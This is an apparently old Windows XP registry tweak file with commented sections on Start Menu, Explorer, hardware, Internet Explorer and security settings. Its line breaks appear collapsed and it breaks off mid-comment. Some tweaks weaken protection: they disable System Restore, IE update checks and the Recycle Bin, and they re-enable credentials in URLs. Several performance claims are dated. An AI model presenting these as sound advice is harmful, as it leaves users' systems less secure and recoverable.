;Disable Baloon Tips[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"EnableBalloonTips"=dword:00000000
;Disable the Desktop Cleanup Wizard[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\CleanupWiz]"NoRun"=dword:00000001
;Administrative tools on Control Panel[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{D20EA4E1-3957-11d2-A40B-0C5020524153}]@="Administrative Tools"
;Adds Userpasswords2 to control panel[HKEY_CLASSES_ROOT\CLSID\{98641F47-8C25-4936-BEE4-C2CE1298969D}]@="User Accounts 2""InfoTip"="Starts The Windows 2000 style User Accounts dialog"
[HKEY_CLASSES_ROOT\CLSID\{98641F47-8C25-4936-BEE4-C2CE1298969D}\DefaultIcon]@="%SystemRoot%\\\\System32\\\\nusrmgr.cpl,1"
[HKEY_CLASSES_ROOT\CLSID\{98641F47-8C25-4936-BEE4-C2CE1298969D}\Shell]
[HKEY_CLASSES_ROOT\CLSID\{98641F47-8C25-4936-BEE4-C2CE1298969D}\Shell\Open]
[HKEY_CLASSES_ROOT\CLSID\{98641F47-8C25-4936-BEE4-C2CE1298969D}\Shell\Open\command]@="Control Userpasswords2"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{98641F47-8C25-4936-BEE4-C2CE1298969D}]@="Add Userpasswords2 to Control Panel"
;Control Panel Classic View[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"ForceClassicControlPanel"=dword:00000001
;Show Windows Version on Desktop;[HKEY_CURRENT_USER\Control Panel\Desktop];"PaintDesktopVersion"=dword:00000001
;----------------------------------------------------------------------------------
;----(3/9)----------------Start Menu and Taskbar Tweaks----------------------------
;Show Cascading Control Panel Items[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"CascadeControlPanel"="Yes"
;Show Cascading Network Connections[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"CascadeNetworkConnections"="Yes"
;Show Cascading My Documents Folder;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced];"CascadeMyDocuments"="Yes"
;Show Cascading My Pictures Folder;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced];"CascadeMyPictures"=Yes"
;NoRecentDocsmenu removes the recent documents from the start menu.[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoRecentDocsMenu"=dword:00000001
;Change MenuShowDelay (Start Menu load speed);[HKEY_CURRENT_USER\Control Panel\Desktop];"MenuShowDelay"="10"
;Remove "set programs access default" from startmenu[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoSMConfigurePrograms"=dword:00000001
;Show control panel in start menu[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"Start_ShowControlPanel"=dword:00000002
;Enable scrolling in start menu;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced];"Start_ScrollPrograms"=dword:00000001
;Disable Highlighting New Programs on Start Menu;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced];"Start_NotifyNewApps"=dword:00000000
;Sort Start Menu and Favorites in Alphabetical Order[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu][-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites]
;Show Programs in the Frequently Used Programs List;[HKEY_CLASSES_ROOT\Applications];"NoStartPage"=""
;Remove Frequent Programs List from the Start Menu;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer];"NoStartMenuMFUprogramsList"=dword:00000001;;[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer];"NoStartMenuMFUprogramsList"=dword:00000001
;Remove Username from the Start Menu;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer];"NoUserNameInStartMenu"=dword:00000001;;[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer];"NoUserNameInStartMenu"=dword:00000001
;Remove "All Programs" Button from the Start Menu;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer];"NoStartMenuMorePrograms"=dword:00000001;;[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer];"NoStartMenuMorePrograms"=dword:00000001
;Clear Recent Documents When Windows Exits;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer];"ClearRecentDocsOnExit"=dword:00000001;;[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer];"ClearRecentDocsOnExit"=dword:00000001
;Disable Balloon Tips;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced];"EnableBalloonTips"=dword:00000000
;Disable Automatic Hiding of Inactive Tray Icons;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer];"EnableAutoTray"=dword:00000000
;Disable Grouping of Similar Taskbar Buttons;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced];"TaskbarGlomming"=dword:00000000;;[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced];"TaskbarGlomming"=dword:00000000
;Disable Taskbar Context Menus;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer];"NoTrayContextMenu"=dword:00000001;;[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer];"NoTrayContextMenu"=dword:00000001

;----------------------------------------------------------------------------------
;-----(4/9)-------------------Explorer / System Tweaks------------------------------
;Disable the Unread Mail Message on the Welcome Screen;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\UnreadMail];"MessageExpiryDays"=dword:00000000
;Disable Fast User Switching[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]"AllowMultipleTSSessions"=dword:00000000
;Enable Boot Defrag to speed up booting[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction]"Enable"="Y"
;Disable Recent Documents History[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoRecentDocsHistory"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoRecentDocsHistory"=dword:00000001
;Enable Monitor Power-off on the Logon Screen;[HKEY_USERS\.DEFAULT\Control Panel\Desktop];"PowerOffActive"="1";"ScreenSaveActive"="1";"SCRNSAVE.EXE"="(None)";[HKEY_USERS\.DEFAULT\Control Panel\PowerCfg];"CurrentPowerPolicy"="0"
;Classic search, full path in title bar and address bar.[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState];"FullPath"=dword:00000001;"FullPathAddress"=dword:00000001"Use Search Asst"="no""Settings"=hex:0c,00,02,00,1b,01,e7,77,60,00,00,00
;Disables Preview of Movie file formats (allowing you to move/rename/delete without errors)[-HKEY_CLASSES_ROOT\.avi\ShellEx][-HKEY_CLASSES_ROOT\.mpg\ShellEx][-HKEY_CLASSES_ROOT\.mpe\ShellEx][-HKEY_CLASSES_ROOT\.mpeg\ShellEx]
;This adds the "Open Command Window Here" on the right click menu for folders;[HKEY_CLASSES_ROOT\Directory\shell\cmd];@="Open Command Window Here";[HKEY_CLASSES_ROOT\Directory\shell\cmd\command];@="cmd.exe /k \"cd %L\"";[HKEY_CLASSES_ROOT\Drive\shell\cmd];@="Open Command Window Here";[HKEY_CLASSES_ROOT\Drive\shell\cmd\command];@="cmd.exe /k \"cd %L\""
;Add notepad to right click menu;[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\Notepad];@="Notepad"
;[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\Notepad\command];@="C:\\Windows\\notepad"
;Adds "Copy to" And "Move to" to context menu;[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\Copy To];@="{C2FBB630-2971-11D1-A18C-00C04FD75D13}";[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\Move To];@="{C2FBB631-2971-11D1-A18C-00C04FD75D13}"
;Shortcuts without "Shortcut to.."[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]"link"=hex:00,00,00,00
;Disable System Restore[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]"DisableSR"=dword:00000001
;Show hidden files and folders;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced];"Hidden"=dword:00000002
;Edit .nfo files with notepad[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.nfo]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.nfo\OpenWithList]"a"="NOTEPAD.EXE""MRUList"="a"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.nfo\OpenWithProgids]"nfo_auto_file"=hex(0):
;NoLowDiskSpaceChecks (won't check if you are low on diskspace and pop up a balloon telling you)[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoLowDiskSpaceChecks"=dword:00000001
;Disable Recycle Bin;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket];"NukeOnDelete"=dword:00000001
;Disable CDROM AutoRun;[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom];"AutoRun"=dword:00000000
;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer];"NoDriveTypeAutoRun"=dword:00000091
;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer];"NoDriveTypeAutoRun"=dword:00000091
;Disable CD Burning[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoCDBurning"=dword:00000001
;Disable Tracking of Broken Shortcut Links[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoResolveTrack"=dword:00000001
;Disable Use Web Service to open file[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System]"NoInternetOpenWith"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"InternetOpenWith"=dword:00000000
;Speeds up copying/moving of zip files(disable zip functionality)[-HKEY_CLASSES_ROOT\.zip\CompressedFolder][-HKEY_CLASSES_ROOT\CLSID\{E88DCCE0-B7B3-11d1-A9F0-00AA0060FA31}][-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CompressedFolder]
;Disable Automatic Restart in the event of a BSOD[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl]"AutoReboot"=dword:00000000
;Speed up shutdown[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control]"WaitToKillServiceTimeout"="1000"
[HKEY_USERS\.DEFAULT\Control Panel\Desktop]"AutoEndTasks"="1"
;Application Hung Timeout value[HKEY_CURRENT_USER\Control Panel\Desktop]"HungAppTimeout"="1000"
[HKEY_USERS\.DEFAULT\Control Panel\Desktop]"HungAppTimeout"="1000"
;Automatically End Hung Applications[HKEY_CURRENT_USER\Control Panel\Desktop]"AutoEndTasks"="1"
[HKEY_USERS\.DEFAULT\Control Panel\Desktop]"AutoEndTasks"="1"
;Windows Prefetcher Service; (0=disabled, 1=app launch prefetch, 2=boot prefetch, 3=both)[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters]"EnablePrefetcher"=dword:00000003
;Enable Quick Reboot (Shift+Ctrl+Alt+Del)[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]"EnableQuickReboot"="1"
;Disables Error Reporting, but notifies when critical errors occur[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting]"DoReport"=dword:00000000
;Disable Welcome Screen and uses Classic Logon;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon];"LogonType"=dword:00000000
;Disable Windows Picture and Fax Viewer[-HKEY_CLASSES_ROOT\SystemFileAssociations\image\ShellEx\ContextMenuHandlers\ShellImagePreview]
;Increasing Icon Cache[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]"Max Cached Icons"="2000"
;Do not use Simple File Sharing;[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa];"forceguest"=dword:00000000
;Speedup network browsing[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RemoteComputer\NameSpace\{D6277990-4C6A-11CF-8D87-00AA0060F5BF}][-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RemoteComputer\NameSpace\{2227A280-3AEA-1069-A2DE-08002B30309D}]
;Speedup network logon/boot[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]"SynchronousMachineGroupPolicy"=dword:00000000"SynchronousUserGroupPolicy"=dword:00000000
;Speed up net by improving DNS resolution[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters]"CacheHashTableBucketSize"=dword:00000001"CacheHashTableSize"=dword:00000180"MaxCacheEntryTtlLimit"=dword:0000fa00"MaxSOACacheEntryTtlLimit"=dword:0000012d
;Disable "Offline Files and Folders";[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\NetCache];"SyncAtLogon"=dword:00000000;"SyncAtLogoff"=dword:00000000;"NoReminders"=dword:00000001;;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\NetCache];"Enabled"=dword:00000000
;Speed up opening of My Computer and Explorer[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\stisvc]"Start"=dword:00000004
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoSaveSettings"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"NoNetCrawling"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoRemoteRecursiveEvents"=dword:00000001
;Optimize the Windows Server Service (1=minimise memory, 2=balance, 3=max netw. throughput)[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]"Size"=dword:00000002
;Clear the Page File at System Shutdown;Use 00000000 for a faster shutdown;Use 00000001 for security reasons or if your pagefile usage is always high;[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management];"ClearPageFileAtShutdown"=dword:00000001
;----------------------------------------------------------------------------------
;-----(5/9)--------------------System/Hardware Tweaks------------------------------
;Change System Environment Variables;[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment];"TEMP"="N:\\Temp";"TMP"="N:\\Temp"
;Disable sticky keys (Popups up when pressing shift for some time, accessibility)[HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys]"Flags"="506"
;Disable the NTFS Last Access Time Stamp (speeds up viewing folders in ntfs)[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem]"NtfsDisableLastAccessUpdate"=dword:00000001
;Change the Number of Page Table Entries[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]"SystemPages"=dword:0000C350
;Show Run in Separate Memory Space Option to run 16 bit programs in VDM;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer];"MemCheckBoxInRunDlg"=dword:00000001;;[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer];"MemCheckBoxInRunDlg"=dword:00000001
;Force Windows to Unload DLLs from Memory[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AlwaysUnloadDLL]"Default"="1"
;Improve Core System Performance **** WARNING : Requires atleast 512 MB RAM![HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]"DisablePagingExecutive"=dword:00000001
;Increase IoPageLockLimit (disk cache); Note- Use the following settings depending on your system RAM:; 00020000 = 131072 KB (if RAM > 512 MB); 00010000 = 65536 KB (if RAM > 256 MB); 00008000 = 32768 KB (if RAM > 128 MB); 00004000 = 16384 KB (if RAM > 64 MB); 00002000 = 8192 KB (if RAM > 32 MB); 00001000 = 4096 KB (if RAM < 32 MB)[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]"IoPageLockLimit"=dword:00020000
;Enable UDMA-66 Support (WARNING: Newer MOBOs only, intel chipsets);Speeds up drives[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Class\{4D36E96A-E325-11CE-BFC1-08002BE10318}\0000]"EnableUDMA66"=dword:00000001
;Optimize L2 Cache Detection (Manual); Note: Change the setting depending on the L2 Cache of your CPU.; If you dont know the L2 cache of your CPU, use a freeware program like CPU-Z; http://www.cpuid.com/cpuz.php;; 8192 KB = 00002000; 4096 KB = 00001000; 2048 KB = 00000800; 1024 KB = 00000400; 512 KB = 00000200; 256 KB = 00000100;[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]"SecondLevelDataCache"=dword:00000800
;Prioritize CMOS RealTime Clock Using IRQ8[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\PriorityControl]"Win32PrioritySeparation"=dword:00000026"IRQ8Priority"=dword:00000001
;nVidia OverClock/Tweak mode enable (Note: Use only if you have an nVidia Card!;[HKEY_LOCAL_MACHINE\SOFTWARE\NVIDIA Corporation\Global\NVTweak];"CoolBits"=dword:00000003
;----------------------------------------------------------------------------------
;----(6/9)--------------------------Visual Effects Tweaks--------------------------
;Dont show window contents while dragging;[HKEY_CURRENT_USER\Control Panel\Desktop];"DragFullWindows"="0"
;Disable Windows Animation Function (while max, min windows)[HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics]MinAnimate="0"
;Visual FX Settings:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects]"VisualFXSetting"=dword:00000003
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\AnimateMinMax]"DefaultApplied"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\ComboBoxAnimation]"DefaultApplied"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\CursorShadow]"DefaultApplied"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\DragFullWindows]"DefaultApplied"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\DropShadow]"DefaultValue"=dword:00000001"DefaultApplied"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\FontSmoothing]"DefaultValue"=dword:00000001"DefaultApplied"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\ListBoxSmoothScrolling]"DefaultApplied"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\ListviewAlphaSelect]"DefaultValue"=dword:00000001"DefaultApplied"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\ListviewShadow]"DefaultValue"=dword:00000001"DefaultApplied"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\ListviewWatermark]"DefaultValue"=dword:00000001"DefaultApplied"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\MenuAnimation]"DefaultValue"=dword:00000001"DefaultApplied"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\SelectionFade]"DefaultValue"=dword:00000001"DefaultApplied"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\TaskbarAnimations]"DefaultValue"=dword:00000001"DefaultApplied"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\Themes]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\TooltipAnimation]"DefaultValue"=dword:00000001"DefaultApplied"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\WebView]"DefaultApplied"=dword:00000001
;----------------------------------------------------------------------------------
;-----(7/9)----------------------Internet Explorer---------------------------------
;Disable IE just in time debugger[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]"Disable Script Debugger"="yes"
;Auto-Complete[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\AutoComplete]"Append Completion"="yes"
;Disable IE updates check[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]"NoUpdateCheck"=dword:00000001
;Change IE Start page[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]"Start Page"="about:blank"
;Adds search keywords to Internet Explorer[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl\MSKB]@="http://support.microsoft.com/?kbid=%s"[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl\AV]@="http://www.altavista.com/sites/search/web?q=%s"[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl\Ggl]@="http://www.google.com/search?q=%s"[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl\MSN]@="http://search.msn.com/results.asp?q=%s"[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl\FM]@="http://www.filemirrors.com/search.src?file=%s"
;Prevents Internet Explorer windows from being reused[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]"AllowWindowReuse"=dword:00000000
;Max your Internet Explorer's simultaneous downloads to 10 (default was 2)[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]"MaxConnectionsPer1_0Server"=dword:0000000a"MaxConnectionsPerServer"=dword:0000000a
; Enable username:password@site.com in Internet Explorer and Windows Explorer.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE]"iexplore.exe"=dword:00000000"explorer.exe"=dword:00000000
;Change IE's title bar caption;[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main];"Window Title"="[deXter]s SuperTweaked IE"
;----------------------------------------------------------------------------------
;-----(8/9)----------------Security / Privacy Related------------------------------;; Note: All the settings here are commented out. Enable them only if required;
;Disabling Ctrl+Alt+Del;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon];"DisableCAD"=dword:00000001
;Disable Registry Editing Tools;[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System];"DisableRegistryTools"=dword:00000001
;Disable Windows Installer;0=default, 1=admin only, 2=disabled;[HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer];"DisableMSI"=dword:00000002
;Disable the Ability to Right Click on the Desktop;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer];"NoViewContextMenu"=dword:00000001;;[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer];"NoViewContextMenu"=dword:00000001
;Change the Logon Window to Classic;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon];"LogonType"=dword:00000000
;Hide the Last User Name;[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System];"DontDisplayLastUserName"=dword:00000001
;Legal Notice Dialog Box Before Logon;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon];"LegalNoticeCaption"="Type the caption for your message here";"LegalNoticeText"="Type your message here"
;Show Administrator on the Welcome Screen;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList];"Administrator"=dword:00000001
;Disable the Auto Logon Shift Override Feature;[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon];"IgnoreShiftOverride"="1"
;Hide Usernames from the Logon Screen;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList];"Name of a user"=dword:00000000;"Name of another user"=dword:00000000;"Name of third user"=dword:00000000; etc...
;Disable the Windows Key;[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout];"Scancode Map"=hex:00,00,00,00,00,00,00,00,03,00,00,00,00,00,5b,e0,00,00,5c,e0,\; 00,00,00,00
;Disable Windows Script Host;[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings];"Enable"=dword:00000000
;Disable Windows File Protection (WFP) (to enable, change to 0);[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Add];"SFCDisable"=dword:FFFFFF9D
;----------------------------------------------------------------------------------
;----(9/9)----------------Misc Application Tweaks----------------------------------
;Remove WMP Right Click Options (Queue-it-up, etc.)[-HKEY_CLASSES_ROOT\CLSID\{CE3FB1D1-02AE-4a5f-A6E9-D9F1B4073E6C}][-HKEY_CLASSES_ROOT\CLSID\{F1B9284F-E9DC-4e68-9D7E-42362A59F0FD}][-HKEY_CLASSES_ROOT\CLSID\{8DD448E6-C188-4aed-AF92-44956194EB1F}]
;Removes Sign up with Passport Wizard when trying to sign in MSN Messenger[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Passport]"RegistrationCompleted"=dword:00000001
;Enabling Status Bar in Notepad without affecting word wrap[HKEY_CURRENT_USER\Software\Microsoft\Notepad]"StatusBar"=dword:00000001
;Disable Windows Installer Rollback (faster msi installs)[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer]"DisableRollback"=dword:00000001
;Remove QuickTime Icon from Taskbar[HKEY_LOCAL_MACHINE\SOFTWARE\Apple Computer, Inc.\QuickTime\ActiveX]"QTTaskRunFlags"=dword:00000002
;Disable Messenger integration with Outlook (not OE)[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\10.0\Outlook\InstantMessaging]"ForceDisableIM"=dword:00000001
;Change Windows Media Player Bitrates; Use the following values to use a bitrate of your choice; 320 Kbps = 0004e200; 256 Kbps = 0003e800; 224 Kbps = 00036b00; 192 Kbps = 0002ee00; 160 Kbps = 00027100; 128 Kbps = 0001f400; 112 Kbps = 0001b580; 64 Kbps = 0000fa00; 56 Kbps = 0000dac0;[HKEY_LOCAL_MACHINE\Software\Microsoft\MediaPlayer\Settings\MP3Encoding]"LowRate"=dword:0000dac0"MediumRate"=dword:0001f400"MediumHighRate"=dword:0003e800"HighRate"=dword:0004e200
;Change Windows Media Player Title (eg: Windows Media Player provided by [deXter]; The 'Provided By' is added automatically, hence specify only the OEM name below:;[HKEY_CURRENT_USER\Software\Policies\Microsoft\WindowsMediaPlayer];"TitleBar"="[deXter]"
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Uninstall wisptis.exe and tablet pc components; which are run while using adobe acrobat 6;; Taken from Davey's post (neowin.net); Original Source: http://www.turcic.com/ (By Alexander 